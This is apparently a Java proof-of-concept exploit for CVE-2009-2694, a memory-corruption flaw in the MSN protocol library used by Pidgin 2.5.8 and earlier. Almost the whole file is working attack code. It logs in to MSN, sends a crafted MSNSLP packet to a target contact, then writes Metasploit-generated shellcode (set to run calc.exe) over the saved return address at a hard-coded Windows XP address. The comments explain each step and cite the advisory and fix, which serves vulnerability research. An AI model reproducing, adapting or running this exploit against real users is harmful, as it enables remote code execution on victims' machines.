/*
* Pidgin MSN <= 2.5.8 Remote Code Execution
*
* Pierre Nogues - pierz@hotmail.it
* http://www.indahax.com/
*
*
* Description:
* Pidgin is a multi-protocol Instant Messenger.
*
* This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].
 * The library "libmsn" used by Pidgin does not safely handle specially crafted MSNSLP packets;
 * a crafted packet can corrupt memory (an arbitrary write, per the Core Security advisory [2]).
*
* Affected versions :
* Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.
*
 * Platforms (vulnerable) :
 * Windows, Linux, Mac. Note: the shellcode and the hard-coded return address in this PoC are
 * specific to Windows XP SP3-FR running Pidgin 2.5.8 (see reteip below); other builds will differ.
*
* Fix :
* Fixed in Pidgin 2.5.9
* Update to the latest version : http://www.pidgin.im/download/
*
* References :
* [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694
* [2] http://www.coresecurity.com/content/libpurple-arbitrary-write
* [3] http://www.pidgin.im/news/security/?id=34
*
* Usage :
* You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/
 * javac.exe -cp "%classpath%;.\jml-1.0b3-full.jar" PidginExploit.java
 * java -cp "%classpath%;.\jml-1.0b3-full.jar" PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL
 * (the password is passed on the command line, so it is visible in the process list and shell history)
*
*/
import net.sf.jml.*;
import net.sf.jml.event.*;
import net.sf.jml.impl.*;
import net.sf.jml.message.p2p.*;
import net.sf.jml.util.*;
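/**
 * Proof-of-concept for CVE-2009-2694 (Pidgin &lt;= 2.5.8 MSNSLP memory corruption).
 *
 * Flow, as implemented below:
 * 1. Log in to MSN with the supplied account and open a switchboard with the target.
 * 2. Send an MsnP2PSlpMessage with flag 0x1000020 and a total length that reaches past the
 *    chosen stack address. Per the original author's note, this makes the vulnerable client
 *    allocate a bogus MsnSlpPacket whose buffer pointer is null.
 * 3. When the target's P2P ACK arrives, send an MsnP2PDataMessage whose offset is {@code neweip}.
 *    Because the buffer is null, offset == absolute address, so the payload is written at
 *    {@code neweip}: the shellcode occupies [neweip, reteip) and the trailing 4 bytes land
 *    exactly on {@code reteip}, the saved return address, which then points at the shellcode.
 *
 * Caveats a tester should know before running this:
 * - {@code reteip} is a fixed stack address for XP SP3-FR / Pidgin 2.5.8; on any other build the
 *   write lands elsewhere and the target most likely just crashes.
 * - The credentials are taken from argv, so they are exposed in the process list and shell history.
 * - The P2P listener fires on any P2P message on the switchboard, not only the ACK for our
 *   session, and nothing here verifies the session id before sending the payload.
 * - Only run this against systems you are authorized to test.
 */
public class PidginExploit {
    private MsnMessenger messenger;
    private final String login;
    private final String password;
    private final String target;

    /** Random MSNP2P session id; both packets must carry the same id so the client pairs them. */
    private final int session_id = NumberUtils.getIntRandom();

    /**
     * Payload executed on the target.
     *
     * The first 6 bytes ("sub esp, 0x500") move the stack pointer away from the shellcode:
     * at the time control is hijacked eip == esp, so any push from the shellcode would otherwise
     * overwrite the shellcode itself.
     */
    private final byte[] shellcode = new byte[] {
        // sub esp, 0x500
        (byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,
        // windows/exec - 121 bytes - http://www.metasploit.com
        // EXITFUNC=process, CMD=calc.exe (the trailing bytes are "calc.exe\0")
        (byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,
        (byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,
        (byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,
        (byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,
        (byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,
        (byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,
        (byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,
        (byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,
        (byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,
        (byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,
        (byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,
        (byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,
        (byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,
        (byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,
        (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,
        (byte) 0x00
    };

    /**
     * Address of the saved return address on the target's stack.
     * Valid only for XP SP3-FR with Pidgin 2.5.8; there is no ASLR to defeat on that platform,
     * but any other OS/build/locale changes this value.
     */
    private final int reteip = 0x0022CFCC;

    /** Address the payload is written to, i.e. reteip - shellcode.length (also the new eip). */
    private int neweip;

    /** shellcode followed by the 4-byte little-endian new return address. */
    private final byte[] payload = new byte[shellcode.length + 4];

    /**
     * Declared total length of the bogus transfer. It must extend past reteip + 4 so that the
     * later write at offset neweip of payload.length bytes stays "inside" the announced size.
     */
    private final int totallength = reteip + 4;

    public static void main(String[] args) throws Exception {
        if (args.length != 3) {
            System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");
        } else {
            PidginExploit exploit = new PidginExploit(args[0], args[1], args[2]);
            exploit.start();
        }
    }

    /**
     * Builds the payload: shellcode, then the little-endian pointer to the shellcode.
     *
     * @param login    MSN account used to send the packets
     * @param password password for that account (exposed on the command line by main)
     * @param target   MSN address of the victim client
     */
    public PidginExploit(String login, String password, String target) {
        this.login = login;
        this.password = password;
        this.target = target;
        // Shellcode is placed immediately below the saved return address; the last 4 payload
        // bytes therefore overwrite reteip with a pointer to the start of the shellcode.
        neweip = reteip - shellcode.length;
        System.arraycopy(shellcode, 0, payload, 0, shellcode.length);
        putLittleEndian(payload, shellcode.length, neweip);
    }

    /** Writes {@code value} as a 32-bit little-endian integer (x86 byte order) at buf[offset..offset+3]. */
    private static void putLittleEndian(byte[] buf, int offset, int value) {
        buf[offset] = (byte) (value & 0xFF);
        buf[offset + 1] = (byte) ((value >>> 8) & 0xFF);
        buf[offset + 2] = (byte) ((value >>> 16) & 0xFF);
        buf[offset + 3] = (byte) ((value >>> 24) & 0xFF);
    }

    /** Creates the messenger, registers the listeners and logs in; everything else is event driven. */
    public void start() {
        messenger = MsnMessengerFactory.createMsnMessenger(login, password);
        messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);
        messenger.setLogIncoming(false);
        messenger.setLogOutgoing(false);
        initMessenger(messenger);
        messenger.login();
    }

    /**
     * Wires the three listeners that drive the exploit:
     * contact list ready -> open switchboard -> invite target -> send SLP packet;
     * P2P message received -> send data packet (the actual memory write).
     */
    protected void initMessenger(MsnMessenger messenger) {
        messenger.addContactListListener(new MsnContactListAdapter() {
            @Override
            public void contactListInitCompleted(MsnMessenger messenger) {
                // Attachment used to recognise the switchboard we requested below.
                final Object id = new Object();
                messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {
                    @Override
                    public void switchboardStarted(MsnSwitchboard switchboard) {
                        if (id != switchboard.getAttachment()) {
                            return;
                        }
                        switchboard.inviteContact(Email.parseStr(target));
                    }

                    @Override
                    public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {
                        if (id != switchboard.getAttachment()) {
                            return;
                        }
                        MsnP2PSlpMessage msg = new MsnP2PSlpMessage();
                        msg.setIdentifier(NumberUtils.getIntRandom());
                        msg.setSessionId(session_id);
                        msg.setOffset(0);
                        msg.setTotalLength(totallength);
                        msg.setCurrentLength(totallength);
                        // Per the original author: this flag makes Pidgin create a bogus MsnSlpPacket
                        // whose buffer pointer is null, so later data offsets become absolute addresses.
                        msg.setFlag(0x1000020);
                        msg.setP2PDest(target);
                        switchboard.sendMessage(msg);
                        System.out.println("First packet sent, waiting for the ACK");
                    }

                    @Override
                    public void switchboardClosed(MsnSwitchboard switchboard) {
                        System.out.println("switchboardClosed");
                        switchboard.getMessenger().removeSwitchboardListener(this);
                    }

                    @Override
                    public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {
                        System.out.println("contactLeaveSwitchboard");
                    }
                });
                messenger.newSwitchboard(id);
            }
        });

        messenger.addMessageListener(new MsnMessageAdapter() {
            @Override
            public void p2pMessageReceived(MsnSwitchboard switchboard, MsnP2PMessage message, MsnContact contact) {
                // Expected to be the ACK of the SLP packet; its identifier is reused for the data
                // packet. NOTE(review): nothing checks that this message belongs to session_id,
                // so any P2P message on this switchboard triggers the write.
                // The third argument is taken to be the offset (it mirrors setOffset above) --
                // verify against jml's MsnP2PDataMessage if the library version differs.
                MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,
                        payload.length, payload, target);
                switchboard.sendMessage(msg);
                System.out.println("ACK received && Payload sent !");
                System.out.println("Exploit OK ! CTRL+C to quit");
            }
        });

        messenger.addMessengerListener(new MsnMessengerAdapter() {
            @Override
            public void loginCompleted(MsnMessenger messenger) {
                System.out.println(messenger.getOwner().getEmail() + " login");
            }

            @Override
            public void logout(MsnMessenger messenger) {
                System.out.println(messenger.getOwner().getEmail() + " logout");
            }

            @Override
            public void exceptionCaught(MsnMessenger messenger, Throwable throwable) {
                System.out.println("caught exception: " + throwable);
            }
        });
    }
}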



